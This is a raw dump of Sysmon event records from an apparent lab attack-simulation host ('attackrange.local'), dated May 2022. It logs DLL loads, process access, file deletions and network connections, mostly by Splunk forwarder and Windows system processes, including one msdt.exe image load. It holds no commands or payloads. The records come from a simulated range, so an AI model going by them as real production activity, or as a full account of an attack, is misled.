CorporationMSXML6.dllMD5=713974F49A72B2239989F2C671747CC0,SHA256=52333BF669EBBFFD2E3169AC2F718D4A106A87D73DE74C07E7E824651FDDAFA7,IMPHASH=FCAD6732873DA041FB25E83E799A2652trueMicrosoft WindowsValid 734700x800000000000000099160Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:37.031{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2,IMPHASH=0BE8D1F061DD646F6D2B834CB7C9C900trueMicrosoft WindowsValid 10341000x800000000000000099159Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:37.016{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+ebd30|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099158Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:37.016{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+81330|C:\Windows\System32\SHELL32.dll+ebcec|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000099157Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:37.016{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+ebcc0|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099156Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:37.016{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+ffe59|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000099166Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:38.453{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C78102648D90F861C60E616BE61DA34F,SHA256=0AFECF26EABF1FF3B2A8D52EB824084D35BBD5FBC1F34C9969B64E08B04CBA0F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099167Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:39.547{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66DE1BAF80EA0A3C8BC5AC1BF2CA9C8E,SHA256=85E4CDA2A5BCA8C5E318F2D642D2E7B7868F807E527DF993A9F866063E6004E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099168Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:40.641{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54ABC84352CEABC12E878EE4CB952ABC,SHA256=6F941573346EDEBAB2DAA9A69B2EDBD1D28FBAF13ABE01BAF9990B173FB25F1E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099170Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:41.734{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3287722E60F1ECBC38DE9A04C7A6C988,SHA256=B8221D904721456A5646632FC3163CB0B1FC358CBEDAE64AABF8B4C977DE5FBC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099169Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:38.115{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53330-false10.0.1.12-8000- 23542300x800000000000000099171Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:42.828{326FD73D-A45C-6294-5601-000000005502}6368NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DA9046A355B537B3CBC86C0ECAB60AB,SHA256=ACEBF124D38749C10C4EFD12D7CE6787E215BCE6CE8493640B4EE887AE03C684,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099176Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:43.927{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80D8ED786635E8381FD2576AC173E59A,SHA256=3E4BE658FB7D4B941403711793D302BD0423F746B33631329692B82BE0AD0375,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099175Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:43.599{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4CAD73CD5AB0C8DFA3422767D51D0B27,SHA256=9FD49CE69D568B1042862D0F24C303067C5D86C1BA6670129F755CE5A51F7F3F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099174Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:40.412{326FD73D-A253-6294-0B00-000000005502}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local53331-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local389ldap 354300x800000000000000099173Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:40.412{326FD73D-A262-6294-2300-000000005502}2720C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local53331-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local389ldap 23542300x800000000000000099172Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:43.336{326FD73D-A262-6294-2400-000000005502}2732NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-099f25d280474ac19\channels\health\respondent-20220530105428-126MD5=3A7897B317CA03B79FE07533175F9643,SHA256=F76FF17815B8F96571634A983322FD544389A7130FC207258DDFB92658757A4D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099177Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:44.318{326FD73D-A262-6294-2400-000000005502}2732NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-099f25d280474ac19\channels\health\surveyor-20220530105426-127MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000099226Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.896{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 
734700x800000000000000099225Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.896{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000099224Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.896{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000099223Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.896{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x800000000000000099222Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.896{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000099221Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.896{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x800000000000000099220Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.896{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x800000000000000099219Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.896{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x800000000000000099218Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.881{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000099217Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.881{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000099216Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.881{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 
734700x800000000000000099250Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000099249Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000099248Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000099247Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000099246Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000099245Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000099244Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 10341000x800000000000000099243Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099242Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000099241Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 
734700x800000000000000099240Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000099239Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exeMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2trueSplunk, Inc.Valid 10341000x800000000000000099238Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:46.881{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099237Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099236Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:46.881{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099235Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-A252-6294-0500-000000005502}4161908C:\Windows\system32\csrss.exe{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program 